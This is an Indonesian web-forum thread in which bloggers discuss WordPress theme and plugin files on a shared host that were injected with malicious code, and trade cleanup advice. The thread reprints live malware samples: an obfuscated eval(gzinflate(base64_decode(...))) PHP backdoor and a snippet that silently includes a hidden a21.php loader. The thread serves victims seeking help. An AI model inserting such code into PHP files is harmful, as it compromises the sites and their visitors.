[Please Help Me..!] Theme blog satu hosting kena inject kode anehh..

Dear all,...

Mohon bantuannya mastah2, sejak tadi pagi jam 3 ane cek theme blog ane,

pada pagian header.php, index.php, sidebar.php, pokoknya semua bagian kecuali bagian style.css , kena inject kode2 sbb:

Code:

<?php /*e1759ac901faed1af84151785ae7b57d*/ eval(gzinflate(base64_decode('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')));?>

kode2 tersebut terletak pada bagian baris paling atas.
dan yg paling mengenaskan, ini terjadi pada semua theme dan semua blog ane yg ada dalam satu hosting,.. kira2 knp ya??

 

waduh, ane gak bisa bantu nich GAn. ane gak paham coding di WP.. sorry banget gan gak bisa bantu. moga aja yang dibawah ane ada yang kasih solusi tepat.. dan moga aja cepat kelar masalahnya

 

PHP:

/*indzrsvgdmezjhkrbnnbxxerocbetagydfvvidlzlrrjoikmvg*/ 
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/hsphere/local/home/c314534/districtlimerick.com/wp-includes/js/tinymce/themes/advanced/skins/default/img/a21.php';
if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);
if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}


Inject a21.php

 

Tuh kode di encryp gan.. Coba cari di google descriptornya.. Oya itu base 64 kalo ga salah.. Dah lama ga ktmu kode2 bgtu

 

coba aja cari di google XSS + SQL Injection.

buat antisipasi pasang plugins :
- Block Bad Queries
- Wp-Firewall
dan sebagai nya

 

,,wahh dihapus gan tuh file2nya
Decode Base64 tuh
,kalo pngen aman
update wp 3.2 trus pasang aj wp firewall

dah aman dh tu

 

cb file di /wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img yg php d hapus smua,,
trus di reinstal wp nya,, skalian themes yg dgunain d instal lg, trus plugin jg instal ulang

nih kyanya wp 3.2 ada lubang ni, ane jg baru kna,, cb slidik2 ke forum heker ahhh clinkkkkkkk

---------- Post added at 09:15 PM ---------- Previous post was at 09:04 PM ----------

dpt kabar,
exploit-db.com/exploits/17514/
phpMyAdmin 3.x diketahui lubangnyaaaaaaaaa apa ini pnyebabnya? ane jg kena

 

lha ini kena nya setelah update ke versi 3.2

 

nasib kit sama gan, ane kasusnya kemaren juga. syukurlah cuma 1 blog.

 

wadohhh....3.2 udah ada lobang. terpaksa ngepatch ini

 

coba cek di http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=wordpress&filter_exploit_text=wordpress&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=

Mungkin ada plugin agan yang vulnerable, yang lagi rame is-human sama tiny_mce mending di lepas aja kalo gak paham patch bug nya

 

wah,,numpang nyimak yaa,,

 

sama dgn ane mas
setelah ane cek itu yg kena inject mulai dari file di folder wp-content
tau nic gmn cara ngilainnya

 

WP terbaru kok udah rentan ya.. perasaan dalam sebulan udah beberapa kali update nih WP

 

dulu pernah kena..setelah googling, hackernya nyuri data2 yg ada di ftp client yg gk pakai ftps..jadi hampr semua blog ane yg datanya ada di 1 ftp kena semua
solusinya, ya scan aja semua file di hosting itu dan minta pihak hosting buatin directory baru. dan jangan pernah save data2 login di ftp..ckp copas aja tiap kali mau pake

cb scan blog2 tmn2 disini unmaskparasites.com

 

ternyata masih banyak bugs..pantes kemarin ada update wp 3.2.1

 

gue jg kena bro 3 blog dalam 1 hosting themesnya kena hack model gini padahal dah update ke wp 3.2.1 ga ngaruh juga
terpaksa bersihin satu - satu pertama hapus semua file yang bukan extensinya image di /wp-includes/js/tinymce/themes/advanced/skins/default/img/ karena pas ane download yang masih fresh folder itu isinya cuman image doang. abis itu buka files themes satu persatu (kecuali files css)hapus deh semua file yang diencode yang ada diatas <?php the header

 

coba cek lagi
yg kena inject code bukan cuman file2 d theme tapi juga semua file2 yg ada di plugin
dan yg parah file index juga kena inject
solusinyanya ya instal ulang semua bro!

 

ikut menyimak dulu..